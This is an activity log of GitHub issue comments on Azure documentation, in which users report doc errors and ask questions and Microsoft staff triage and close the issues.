[2019-02-21 09:03] gxgrammatikos commented on #24561
I checked again and it worked. Probably something changed in the Portal because I follow the same steps since the time I send the feedback and now the deploy was successful without any error.

[2019-02-21 09:05] jakaruna-MSFT commented on #25323
@DianeHadley  I have assigned the issue to the content author to investigate further and update the document as appropriate.

@aljo-microsoft Please take care of this request

[2019-02-21 09:08] mcurko opened #25437 "Note"
With CLI either use spaceless location names, either put quotation marks aroud variables, otherwise you'll end up with errors like: "az: error: unrecognized arguments: europe".

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 30ef211a-c625-61cd-9ae9-ca63e32ff4d2
* Version Independent ID: b60685c0-1d9c-ebcb-4393-e231d7b09

[2019-02-21 09:11] rbhadti94 commented on #23225
Hi @cephalin ,

Thanks for the reply. I agree for development environments and for prototyping this is ideal.

I'm talking from the perspective of higher environments (higher than dev). I'm aware that we can set ```SCM_DO_BUILD_DURING_DEPLOYMENT=true``` but from my experience most are unlikely to deploy directly to higher environments from source control (or from Visual Studio).

I could be wrong

[2019-02-21 09:12] gxgrammatikos commented on #24561
I have a new clue for the feedback, I reproduced it under an Enterprise Agreement Subscription, but not under my MS Azure Sponsorship subscription.

[2019-02-21 09:15] dcbrown16 commented on #16758
@tjvishnu thanks for pointing that out, I'll remove the irrelevant info.

[2019-02-21 09:16] AshokPeddakotla-MSFT commented on #25433
@Aashikms Thanks for the feedback! We are currently investigating and will update you shortly.
Also, can you please link the document that you are referring to?

[2019-02-21 09:17] TehWardy commented on #17959
Quote from my first message here ...

I already have the backups on a storage account in a blob store, the restore command does not work using the same credential command to construct the same creds I used to put the .bak file on the blob store.
I assume the "small step" you're referring to is setting up the blob store & storage account (which I have done), I have then done the "on premise bit" of

[2019-02-21 09:17] GuyHarwood commented on #25247
Hi @Grace-MacJones-MSFT The Key vault references that appear inline in the app settings.

I have a 'web app for containers' app service running a node-js express app and i would like to use the` @Microsoft.KeyVault({item})` feature.

[2019-02-21 09:25] KetanChawda-MSFT commented on #25430
@yuwzho Thanks for the feedback! I have assigned the issue to the content author to evaluate and update as appropriate.

[2019-02-21 09:37] SubhashVasarapu-MSFT commented on #25435
@hisasima Thanks for your feedback. We looking into this issue and will update you as soon as possible.

[2019-02-21 09:41] atullalwani commented on #24556
Thanks for the update Rachel.

[2019-02-21 09:42] SubhashVasarapu-MSFT commented on #25428
Thanks for your feedback. We looking into this query and will update you as soon as possible.

[2019-02-21 09:43] roelal opened #25438 "patching schedule"
Is there any information about patching available? E.g. similar to the docs about it for App Service: https://docs.microsoft.com/en-us/azure/app-service/overview-patch-os-runtime

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 2f5e4798-d1ea-e82b-0459-2e268387152d
* Version Independent ID: 1bb7d77d-0b97-3190-ea91-9a10a01

[2019-02-21 09:44] SubhashVasarapu-MSFT commented on #25424
@dinu99 Thanks for your feedback. We looking into this issue and will update you as soon as possible.

[2019-02-21 09:45] abdulbasit24434 commented on #19907
@areddish need your help!
![image](https://user-images.githubusercontent.com/47850472/53159225-41d97a80-35e7-11e9-98d2-f5c2a396a8f3.png)

[2019-02-21 09:50] Wedvich commented on #24770
@jflieben FWIW, from my own testing yesterday only the users who manage the Conditional Access policies have needed an AAD Premium license. The policies were applied to all targeted users, regardless of whether they had a license or not.

[2019-02-21 09:58] Aashikms commented on #25433
I am referring to below below document concepts.
https://docs.microsoft.com/en-us/azure/iot-edge/tutorial-python-module
https://docs.microsoft.com/en-us/azure/iot-edge/how-to-register-device-vscode
https://docs.microsoft.com/en-us/azure/iot-central/concepts-connectivity

Thanks,

[2019-02-21 09:59] ManojReddy-MSFT commented on #25419
@htate1234 Thanks for the feedback. We are investigating this and will get back to you.

[2019-02-21 10:07] AshokPeddakotla-MSFT commented on #25436
@anonymouse64 Thanks for reporting this. We are working on this and will update as earliest.

[2019-02-21 10:16] KetanChawda-MSFT commented on #25418
@rizwaans Than you for posting your question. We will review and provide an update as appropriate.

[2019-02-21 10:20] sarahzerry opened #25440 "Regarding secret in Keyvault"
unable to fetch the secret from key vault through ARM templates. This error is repeating again and again when the Login password is referenced in the ARM template.
(Note: Given parameter type for all the parameters used).

Error: New-AzureRmResourceGroupDeployment : Cannot retrieve the dynamic parameters for the cmdlet. Parameter type in parameters cannot be null or empty

---
#### Document Detail

[2019-02-21 10:45] SadiqhAhmed-MSFT commented on #25437
@mcurko Thanks for the feedback! We will have this investigated by the content owner and update as appropriate.

[2019-02-21 10:46] happyadam73 commented on #22169
Just an additional thought - there is a document that outlines the various encryption at rest options for different storage and services here:
https://docs.microsoft.com/en-us/azure/security/azure-security-encryption-atrest.

However, I think this needs updating - it only contains one entry for "Backup" and this doesn't state that SSE with MS managed keys is an option even though it is for IaaS VM

[2019-02-21 10:51] sybrenstuvel opened #25442 "Missing 'Preempt' status"
I've heard that there is a 'Preempt' status available for low-priority batch node VMs, but that status isn't mentioned here (nor is there a link to a document that does describe it).

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 479d877a-81a0-5436-76d9-898303c5bbec
* Version Independent ID: f352ae78-1d3f-a780-554c-fc3

[2019-02-21 11:01] tijntje commented on #25048
@aljo-microsoft I understand your remark with the LB. But how can we do this if all traffic is routed by the LB to the Reverse proxy endpoint? The loadbalancer Probe check will be valid because this is checking the RP endpoint on 19081 not the individual service endpoints.

I have same feeling as @lukepuplett that when using the Reverse Proxy behind a Loadbalancer the reverse proxy should only rou

[2019-02-21 11:04] rayne-wiselman commented on #22169
Thanks Adam, I’ll take a few days to look at the different sources and see what we need to update and let you know. Appreciate your feedback!

From: Adam Buckley <notifications@github.com>
Sent: Thursday, February 21, 2019 12:47 PM
To: MicrosoftDocs/azure-docs <azure-docs@noreply.github.com>
Cc: Rayne Wiselman <raynew@microsoft.com>; Mention <mention@noreply.github.com>
Subject: Re: [MicrosoftDocs

[2019-02-21 11:05] DixitArora-MSFT commented on #25408
@bosspoort Template is available in GitHub . Below is the link

https://github.com/Azure/azure-quickstart-templates/tree/master/301-servicebus-namespace-vnet

In a mean while I will create the repro for ARM template available in mentioned docs and will update if there are any issues.

[2019-02-21 11:07] DixitArora-MSFT commented on #25412
@bcube  Yes it is same for Azure Active Directory B2C as well. I have checked and it worked for me.

[2019-02-21 11:11] iricigor commented on #25350
Ha, based on your feedback I think **I narrowed down the bug**. For me it displays the information differently. I tried different tenants and both preview and standard portal, and its the same. The same info is given back to my colleagues: **"Publisher Debian"**. I click on Marketplace / Compute and then search. The same info is displayed if you just search from the top search field on portal.

![

[2019-02-21 11:17] DixitArora-MSFT commented on #25307
@ycedillos Just following up here... Hope my previous comment helps.

[2019-02-21 11:21] KetanChawda-MSFT commented on #25360
@nzmdgnc Just checking in if you have had a chance to see the previous response. We need the information asked in my previous post to investigate this issue further

[2019-02-21 11:30] gitathrun commented on #25242
Great news! Looking forward to it.

[2019-02-21 11:30] #25242 closed

[2019-02-21 11:35] townendk commented on #24952
Also looking for an update. Have a number of customers using Custom Fields as a business critical feature and it seems to have just vanished with the retirement of Classic Logs

[2019-02-21 11:40] ChiragMishra-MSFT commented on #25427
@thala321 Thanks for the feedback. We are investigating into the issue and will update you shortly.

[2019-02-21 11:41] angoyal-msft commented on #25438
@roelal Thanks for your feedback. I couldn't find the exact document you are looking for.
But I have found the below document which might be helpful:

https://downloads.mariadb.org/mariadb/+releases/

If this is not what you are looking for, I would recommend you to provide feedback at the [feedback forum](https://feedback.azure.com/forums/906052-data-catalog). All the feedback you share, is close

[2019-02-21 11:59] RohitMungi-MSFT commented on #25345
@aahill Could you please review the character limit for calling the TextAnalyticsAPI and update it if required?

[2019-02-21 12:00] SaurabhSharma-MSFT commented on #25234
@bcube We will now proceed to close this thread. If there are further questions regarding this matter, please reopen it and we will gladly continue the discussion.

[2019-02-21 12:00] #25234 closed

[2019-02-21 12:03] KetanChawda-MSFT commented on #25418
@rizwaans try with expression mentioned below:

[code]

[2019-02-21 12:04] KetanChawda-MSFT commented on #25434
@CastleArg Thank you posting your question. We will review this and provide and update as appropriate.

[2019-02-21 12:22] JJussi opened #25443 "EventSchema missing"
When new Event Grid Topic is created, there is now drop down selection of Event Schema.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: aa9fcb9e-8d13-c4d1-a5d0-7eeb706c2b51
* Version Independent ID: 642cbcbe-ed7d-1181-fc9a-ee3538446996
* Content: [Send custom events to web endpoint - Event Grid, Azure portal](https://do

[2019-02-21 12:58] mganeshphani opened #25444 "Dataset refresh timesout after 120 minutes"
Hello,

My dataset refresh takes more than 120 minutes when choose 30 days data in configuration... can you make this more efficient or increase the timeout?

I am forced to cut down back to less number of days

-Ganesh M.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: fb954f67-e65e-9bbe-701e-de1eafe8e26f
* Version Ind

[2019-02-21 13:07] cephalin commented on #24581
@Anand-Moghe Both domain registration and CA are provided by GoDaddy. I've added some minimal language in the docs to speak to this. Changes should be live within a day. #please-close.

[2019-02-21 13:18] iam4567 opened #25445 "More capabilities"
Hi,
I tried the feature and this is great, it allows us to cover new cases, thank you.

I have several questions though :

- Does the NoPa feature is available through APIs ? We can invite a guest with API so, maybe we can enable this feature through the request ?

- Can we enforce NoPa to be activated on some specific users ?
We have one case where one of our clients have employees under an Azure

[2019-02-21 13:24] mikakouvo commented on #15291
Hi,

Tried to test this with ADFv2, but I'm facing the issue with failing copy activity:

"errorCode": "2200", "message": "'Type=System.Data.SqlClient.SqlException,Message=The procedure \"usp_upsert_project_table\" has no parameter named \"@DataTypeforProjectTable\".,Source=.Net SqlClient Data Provider,SqlErrorNumber=349,Class=16,ErrorCode=-2146232060,State=1,Errors=[{Class=16,Number=349,State=1,M

[2019-02-21 13:26] mcurko opened #25446 "Warning"
With new Azure PowerShell Az module installed, the template will fail to deploy. I retried on a VM with old PS module, and there it works fine.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: ea439429-69f0-2878-495f-92cbaf61c789
* Version Independent ID: d9e2e3f9-8387-cde6-2042-93bae86645f0
* Content: [Visual Studio Azu

[2019-02-21 13:36] rabrahamOpti commented on #25278
Thank you @PramodValavala-MSFT Apologies, I was searching the documentation for "path parameters" and missed this section you referred me to. Feel free to close this.

[2019-02-21 13:44] PramodValavala-MSFT commented on #25278
@rabrahamOpti No problem at all. Glad we could help! 😄

We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 13:44] #25278 closed

[2019-02-21 13:49] KoenVerbeeck opened #25447 "Error messages can be accessed"
With the following dynamic content, it's possible to retrieve the actual error message from the stored proc activity:
@{activity('storedprocactivityname').Error.Message}

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 45e0996a-5a15-b03a-f204-b8725579109d
* Version Independent ID: 6c8ed85a-8e40-a7b2-c13a-81123aa499d4
* C

[2019-02-21 14:02] MGoedtel commented on #24887
@stgraves and @ganga1980  - Yes, I'll bug this and work with you to correct the error.

[2019-02-21 14:20] mambru opened #25448 "The diagrams are not compatible with the dark theme"
Most of the labels on the diagram can not be read when you use the dark theme. I think adding a white background instead of a transparency will solve it.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 35341297-d419-96bf-7ba7-d7916f6a6d13
* Version Independent ID: b47f0495-66b4-ab5b-e927-743d6c99808f
* Content: [Auto-fo

[2019-02-21 14:27] mambru opened #25449 "Dead Letter queue autoforward"
In the first paragraph there is this sentence:
```Also, it is not possible to chain a subqueue, such as a deadletter queue, to another queue or topic.```

But we have tested this scenario using the property ```SubscriptionDescription.ForwardDeadLetteredMessagesTo``` and the auto forward works.

Is this an error on the documentation or is something that is not fully supported and we should not use

[2019-02-21 14:28] SychevIgor opened #25450 "Locks- where is a truth"
I'm a bit confused.
Here the type was defined as
 "type": "Microsoft.Web/sites/providers/locks",
as well as explained it as
"The following example shows a template that creates an app service plan, a web site, and a lock on the web site. The resource type of the lock is the resource type of the resource to lock and /providers/locks. The name of the lock is created by concatenating the resource nam

[2019-02-21 14:34] gitathrun opened #25451 "Any model file number limitation in one workspace?"
Hi, I remember the preview version of AML service has the limitation about the registered model numbers which is only 12 registered models in one Model Management Account.

Since the workspace replaced the Model Management account and Experimental account, is there any more limitation about the maximum registered model file numbers? Any size limitation of each model file? Such as 100 MB or 1 GB ?

[2019-02-21 14:35] PanosPeriorellis commented on #25193
in the sample look at lines 69, 90 and 95. You will see there how a transcript is obtained. If you are trying to de-serialize the JSON that you get then you will have to build that class from the JSON itself. We can also update the sample to include this.

[2019-02-21 14:39] Ilanak commented on #25193
yeah, this is what i'm trying to do..
I can create this class by myself, but I thought it would be better if you will add it to the docs with comments explaining about the different fields.

[2019-02-21 14:40] PanosPeriorellis commented on #25193
makes sense, will do

[2019-02-21 14:41] Hiteshgkapoor commented on #24917
@ManojReddy-MSFT , @davidmu1 - Any update on this issue please?

[2019-02-21 14:41] jiroseng opened #25452 "Wording of limitation causing confusion with customers"
The following statement in this doc is causing some confusion readers:

"By design, a Managed Instance needs a minimum of 16 IP addresses in a subnet and may use up to 256 IP addresses. As a result, you can use subnet masks /28 to /24 when defining your subnet IP ranges."

More than once I have spoken with individuals that have confused this to mean the largest subnet in which MI could be provisio

[2019-02-21 14:43] m60freeman commented on #25415
Documenting at what point LOG IO gets throttled for each service level would be very helpful. Does it vary only between tiers (Standard vs. Premium, for example) or at various levels within each tier (P1 vs. P2, for example)?

[2019-02-21 14:44] mumian commented on #25437
@mcurko - Thank you very much for taking time to give us the feedback.  I have added double-quotes around $location in the quickstarts and tutorials. The changes will go live later today.

#sign-off

[2019-02-21 14:47] ahalha opened #25453 "Number of question-answer pairs"
the number of question-answer pairs is not clear even in the Azure Search Tier link (https://docs.microsoft.com/en-us/azure/search/search-limits-quotas-capacity#document-limits)

please tell me how to know the exact number of question-answer pair ?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 8b62d38a-cace-8b96-a56d-

[2019-02-21 14:47] maknotavailable commented on #24704
Hi - After changing the subscription using !az login, I am still not able to access my workspace. It is restricting me to a tenant within my account, that I did not set. I used az logout, to logout of all my active account (ERROR: There are no active accounts.), however the notebook is still relying on the wrong tenant.

[2019-02-21 15:10] brettsam commented on #25015
We should create more of a `TelemetryClientFactory` that makes it easier to tweak things like this. Will discuss with @lmolkova and see what we can do. It looks like in this case, @batizar wants to swap out the `DependencyTrackingTelemetryModule` we register [here](https://github.com/Azure/azure-webjobs-sdk/blob/dev/src/Microsoft.Azure.WebJobs.Logging.ApplicationInsights/Extensions/ApplicationInsi

[2019-02-21 15:31] Charmendar opened #25454 "What happens if I forgot to shutdown my service before cancelling subscription"
Will my services be automatically deleted or they would keep alive and I would charged still

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 576cae7d-f9e6-72ef-c6ba-d5a4e359d70d
* Version Independent ID: af78deae-d409-6261-a817-b504965d1988
* Content: [Cancel your Azure subscription](https://docs.microsoft.com/en-us/azu

[2019-02-21 15:33] bjw6092 opened #25455 "Can 8 digit OTP be support for Oath tokens?"
Can 8 digit OTP be support for Oath tokens?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: b8f14188-98ec-5c94-f408-162ee1baa076
* Version Independent ID: 41ed4874-e1e6-56d3-4de4-39c024d1e06c
* Content: [Azure AD authentication methods](https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-authe

[2019-02-21 15:36] eifinger opened #25456 "Generic Webhook is now HTTP Trigger"
I did however notice, that I could not search for "generic" as a function trigger and had to use "HTTP Trigger".
It seems this guide is no longer reflecting the latest Azure Functions Portal Version.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 8e28a15a-e152-3e3a-981b-06b9c9eadd27
* Version Independent ID: ec89a24c-6

[2019-02-21 15:38] EddyP23 opened #25457 "IP Filtering when receiving events at an HTTP endpoint"
We have created an Azure AppServices API that is listening for our EventGrid messages via HTTP endpoints.

On the other hand, we are using IP filtering in our Azure AppServices API, but now we have no mechanism on making sure we don't filter Event Grid messages.

I could not find an IP address that is used by our Event Grid Subscription, nor the list for all EventGrid IPs.

Is there any way we cou

[2019-02-21 15:54] carct commented on #18187
followed and read through the other issues on the doc and found this, which is basically it... but with a slightly different flavor :) check the doc over there

https://github.com/Azure/azure-functions-core-tools

[2019-02-21 15:58] tplas commented on #25214
Um no, I didn’t understand it; pretty short and cryptic and without context. But I am heads-down on something else now; will take another look when I can, some other day. Thanks anyway.

   -Tim Plas

From: Bryan Trach [mailto:notifications@github.com]
Sent: Wednesday, February 20, 2019 8:16 PM
To: MicrosoftDocs/azure-docs
Cc: tplas; Mention
Subject: Re: [MicrosoftDocs/azure-docs] Managed Identity

[2019-02-21 16:00] milanio commented on #24568
@genlin @Karishma-Tiwari-MSFT  Thank you!

[2019-02-21 16:06] Netdoc41 opened #25459 "AKS Autoscale in Preview"
I have been working on testing the autoscale new ability via the AZ AKS.  I have followed the doc. (I think) but i am still getting the error.

Operation failed with status: 'Bad Request'. Details: AgentPool 'agentpool' has set auto scaling as enabled but is not on Virtual Machine Scale Sets, this is not allowed

From reading the items here it seems that there may be a case where it does not work

[2019-02-21 16:19] PramodValavala-MSFT commented on #25448
@mambru Thanks for the feedback! We have assigned this issue to the content author to review and update accordingly.

[2019-02-21 16:19] romankiss opened #25461 "new api-version=2019-01-01"
Couple days ago the AEG team announces a new api version 2019-01-01 from the preview one 2018-09-15-preview.

After this update, I have facing a problem with the REST APIs related to the event domains.

For example:
GET list of all domains
`.../providers/Microsoft.EventGrid/domains?api-version=2019-01-01`

will return an error

[code]

but the REST GET all subscriptions for a specific domain/topic

[2019-02-21 16:20] steverlabs opened #25462 "Links under 'Next steps' open the existing article, forming a link loop"
The 'Connecting Microsoft Advanced Threat Analytics to Azure Security Center' link points to https://docs.microsoft.com/en-us/azure/security-center/security-center-ata-integration, but it opens the existing article, which is frustrating and redundant.

The 'Connecting Azure Active Directory Identity Protection to Azure Security Center' link points to https://docs.microsoft.com/en-us/azure/security

[2019-02-21 16:21] MGoedtel commented on #15815
@hectoralicea - Forgot to fix that, so appreciate bringing this to our attention.  I just addressed it the update will go live later today.  @please-close

[2019-02-21 16:21] PramodValavala-MSFT commented on #25443
@JJussi Thanks for the feedback! We have assigned this issue to the content author to review and update accordingly.

[2019-02-21 16:26] MGoedtel commented on #14323
@takekazuomi & @tfitzmac - I've reviewed all the LA articles that include reference to the API and templates for performing these tasks via CLI/PowerShell and corrected any inaccuracies regarding versioning.  The change will go live later today.  #please-close

[2019-02-21 16:27] YutongTie-MSFT commented on #25453
@ahalha
Thanks for the feedback! I have assigned the issue to the content author to investigate further and update the document as appropriate.

@tulasim88
Hi, the customer is asking about the limit of question-answer pairs. Could you please check this issue and make this clear? Thanks a lot!

[2019-02-21 16:28] YutongTie-MSFT commented on #25451
@gitathrun
Thanks for the feedback! I have assigned the issue to the content author to investigate further and update the document as appropriate.

@nishankgu
Hi Nishank, could you please check this issue and update the document as necessary? Thanks a lot!

[2019-02-21 16:30] paulhickman-a365 opened #25464 "Poor programming style calling async code from inside a constructor"
The example uses the .Result property of an async call from inside a constructor. This is poor style and is likely to lead to async thread deadlocks depending on where the code is invoked from.  You should provide an example here the connection is lazily initialised from an async method.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue l

[2019-02-21 16:30] mimig1 commented on #21770
@MicahMcKittrick-MSFT - Can you reassign to @rachel-msft, she now owns this article.

[2019-02-21 16:31] mimig1 commented on #24346
@angoyal-msft - Can you reassign this issue to @rachel-msft, she owns this article now.

[2019-02-21 16:35] angoyal-msft commented on #24346
@mimig1 Thanks for pointing out. I have assigned this issue to @rachel-msft
@rachel-msft Could you please help us with this issue.

[2019-02-21 16:43] AshokPeddakotla-MSFT commented on #25363
@sandeeppujar Are there any changes made to the doc recently? Git repo has been changed and the files are not available on the link specified. Please check and update as earliest.

[2019-02-21 16:45] PramodValavala-MSFT commented on #25449
@mambru Thanks for the feedback! We will investigate and get back to you on this.

[2019-02-21 16:46] moab360 commented on #25407
Thanks for the quick reply.  Unfortunately the "Upgrade" button is not being shown for me
![image](https://user-images.githubusercontent.com/15697848/53186090-2f464d80-35b5-11e9-949e-0a8ef95b796f.png)

[2019-02-21 17:07] sebader opened #25465 "ARM template example"
I'm looking for an example of an ARM template which creates a new virtual network (with a new subnet for the ACI) and one container instance running inside that subnet. Would be great if you could provide one! Thanks!

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 81e00caf-dd95-441b-d2d5-0b3c979cb11b
* Version Independ

[2019-02-21 17:07] WillAutioItrax opened #25466 "Live Services site fails to work (plus other doc errors)"
Under "Configure and run Windows projects (optional)"
there is the statement:
"5. Go to the Windows Dev Center, and then sign in with your Microsoft account. In My apps, select the new app registration. Then expand Services &gt; Push notifications."

When I click on the "Windows Dev Center" link, I end up in the Partner Center at Windows&gt;Overview which has a list of my apps and reserved names.

[2019-02-21 17:09] slynickel commented on #24870
@iainfoulds this thread is becoming a bit full, but to respond to your question. It's true we can just specify `"properties": { "kubernetesVersion": "1.11.7" }` but we need a human being to manually change the 7 when that version becomes deprecated. I would prefer an RSS feed notification, event hook, or actual github release update, for that human being. Rather than having to setup a calendar rem

[2019-02-21 17:10] sjkp opened #25467 "Should guest with no Azure Subscription access be able to claim partner status?"
The functionality seems pretty useless for tracking azure partners, when everyone with a guess account in a tenant can make a claim. It makes no sense that people that have just been invited to e.g. Teams or SharePoint, can claim a customer as Azure partner. IMHO, you should at least have access to some Azure Subscriptions/Resource group.

---
#### Document Details

⚠ *Do not edit this section. It

[2019-02-21 17:26] smakarsky opened #25468 "Date on the article is confusing"
It's listed as 08/16/2017, but the first sentence of the article has 'The Microsoft Threat Modeling Tool 2018 was released as GA in September 2018 ..', which over a year later.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 7dea734e-e546-2acd-3a6c-c0a8390f9ee9
* Version Independent ID: 3a4c0ad1-7a2f-9590-9b96-e1285ac97

[2019-02-21 17:27] Mike-Ubezzi-MSFT commented on #25452
@jiroseng Thank you for the detailed inquiry. We are investigating this and will update this thread with additional details.

[2019-02-21 17:29] PramodValavala-MSFT commented on #25449
@mambru I've confirmed internally that the doc is indeed out of date.

I have a raised a PR to remove that line from the doc.

[2019-02-21 17:30] mihammer opened #25469 "Misspelled command in documentation"
You used the following misspelling:  Retart-AzVmss
Under the section "restart vms in a scale set"

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 3b02d586-9864-02f3-1edc-0d6d9d48d4d8
* Version Independent ID: 11a05cbf-e85a-2347-7002-7c67b05af032
* Content: [Manage Virtual Machine Scale Sets with Azure PowerShell](https:

[2019-02-21 17:38] erhopf commented on #23489
Hey @wilsonchua20 - I've put together a quick sample using the OKHTTP library for requests. I'm hacking this together based on my knowledge of C# and Python -- so while not pretty, it works and should give you an idea of how the request needs to be structured.

[code]

[2019-02-21 17:38] cynthn commented on #25469
@mihammer Oops! Thanks for catching that! Should be fixed in a build later today. Thank you!

#please-close

[2019-02-21 17:43] PramodValavala-MSFT commented on #25449
@mambru Thanks for contributing to MS Docs! We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 17:43] #25449 closed

[2019-02-21 17:44] TehWardy commented on #17959
Having tested it I can confirm that the right way to do this is using the DMA tool at ...
https://www.microsoft.com/en-us/download/details.aspx?id=53595

... works perfectly!

[2019-02-21 17:46] Mike-Ubezzi-MSFT commented on #24851
Adding MSDN Thread: [Stream data into Azure Databricks using Event Hubs](https://social.msdn.microsoft.com/Forums/en-US/e141d569-cf49-486c-a086-a12de4a91b26/stream-data-into-azure-databricks-using-event-hubs?forum=AzureStreamAnalytics)

[2019-02-21 17:48] Anand-Moghe commented on #25402
@PramodValavala-MSFT Thank you very much. So I am in that exact situation. The APIM is installed in VNET with External setting. There is no problem accessing the developer portal from public internet. But the users in a work station inside on-premise VNET is unable to access the developer portal. I think this explains why.

[2019-02-21 17:49] kobulloc-MSFT commented on #25395
@MisinformedDNA We are going to close this thread as resolved but if there are any further questions regarding the documentation, please tag me in your reply and we will be happy to continue the conversation.

[2019-02-21 17:49] #25395 closed

[2019-02-21 17:54] TravisCragg-MSFT commented on #24977
@theheatDK We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 17:54] #24977 closed

[2019-02-21 17:55] TravisCragg-MSFT commented on #24879
@yobyot We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 17:55] #24879 closed

[2019-02-21 17:55] PaulSells commented on #16061
When deploying a metric alert using the template there appears to be an issue when setting the action group. I'm passing in the the full resource id of an existing ActionGroup in the format

/subscriptions/<subscription ID/resourceGroups/<resourcegroup>/providers/microsoft.insights/actionGroups/<action group name>

I've also tried "[resourceId('microsoft.insights/actionGroups', parameters('actionG

[2019-02-21 17:56] TravisCragg-MSFT commented on #24587
@susanthasilva We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 17:56] #24587 closed

[2019-02-21 17:56] vhorne commented on #19306
#please-close

[2019-02-21 17:57] wurst0815 opened #25470 "Documentation is horrible.. sorry. And functionality also"
First of all the term "Preview" for the Applications using v2 Endpoint is more than confusing.
Second, the term "Web" for a confidential Client and "Public Client" for Mobile & Desktop is extremely misleading. Web could be an Angular App! Please use Terms like "Confidential" and "Non Confidential" or "Public" and "Non Public".
Third, you suggest a special redirect uri for MSAL only ending with ://

[2019-02-21 17:57] TravisCragg-MSFT commented on #19306
@TomaszOledzki We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-21 17:57] #19306 closed

[2019-02-21 17:58] PaulSells commented on #16061
Noticed a typo in my previous post resource id for action group should read:

/subscriptions/<subscription ID>/resourceGroups/<resourcegroup>/providers/microsoft.insights/actionGroups/<action group>

[2019-02-21 17:59] Anand-Moghe commented on #25402
This answer explain the question so closing it.

[2019-02-21 17:59] #25402 closed

[2019-02-21 17:59] KevinTupper opened #25471 "Multiple Containers, One VM"
I've got a properly sized Ubuntu VM so I can handle multiple containers.  I have can run one container at a time and it works fine.  How do I setup docker to support multiple containers.  For instance:  say I want to allow a local application to request sentiment and key phrase.

Changing the second to port 5001:5001 seems to allow the second container to run, but I get no Swagger info return when

[2019-02-21 18:02] Mike-Ubezzi-MSFT commented on #24356
@ShubhaVijayasarathy Can you please review this as a potential security issue, as detailed by the customer.

[2019-02-21 18:02] ggailey777 commented on #24236
@sb2059 thanks for your candid feedback. It's certainly not unreasonable to want the level of WebJobs documentation that you suggest. I do not believe that we have documented WebJobs as well as they can or should be documented. However, having said that we are devoting most of our content resources at this time to supporting Azure Functions (which while presented as a standalone service, really ha

[2019-02-21 18:03] PramodValavala-MSFT commented on #25402
@Anand-Moghe Glad we could help! 😄

[2019-02-21 18:04] MicahMcKittrick-MSFT commented on #25442
Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 18:04] MicahMcKittrick-MSFT commented on #25459
Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 18:04] PatAltimore commented on #25387
Hi @brandonh-msft,

The REST API endpoint is exposed for each deployment using Azure App Service.  For recommendations on how you can you can scale up to mitigate slow API responses, see https://github.com/Azure-Samples/blockchain/blob/master/blockchain-workbench/faq/performance.md.

Thanks,
Pat

[2019-02-21 18:04] #25469 closed

[2019-02-21 18:05] MicahMcKittrick-MSFT commented on #25465
Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 18:06] diberry commented on #25471
@KevinTupper Hi Kevin, have you successfully run multiple containers in your local environment on separate ports before? Are the containers running via separate terminals and a docker run command or are you using docker compose or kubernetes? #in-progress

[2019-02-21 18:07] lnr0626 opened #25474 "Endpoints for batch speech to text"
What are the endpoints for the batch api?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 73fb7e76-fb80-c420-2efe-e3ca3a27b749
* Version Independent ID: 07a42557-deb3-e4b3-3f14-f26a27be49c2
* Content: [How to use Batch Transcription - Speech Services](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-serv

[2019-02-21 18:10] sb2059 commented on #24236
@ggailey777 you have exceptional communication skills.  Thank you.

[2019-02-21 18:10] #24236 closed

[2019-02-21 18:12] TravisCragg-MSFT commented on #23035
@hensilva have you been able to try this with version 1901

[2019-02-21 18:17] Mike-Ubezzi-MSFT commented on #25455
@bjw6092 Thank you for the detailed inquiry. I will make @YutongTie-MSFT aware of this.

[2019-02-21 18:17] Grace-MacJones-MSFT commented on #25464
Hi @paulhickman-a365, thanks for bringing this to our attention. Your feedback has been shared with the content owner for further review.

[2019-02-21 18:20] KevinTupper commented on #25471
I'm using docker run (like the example above shows) in a terminal window.  Two separate terminal windows and I used the -d option for detached.  It shows it's running per docker, but nothing comes back on the swagger web page for port 5001.

I am running in Azure Gov, no Kubernetes option available.

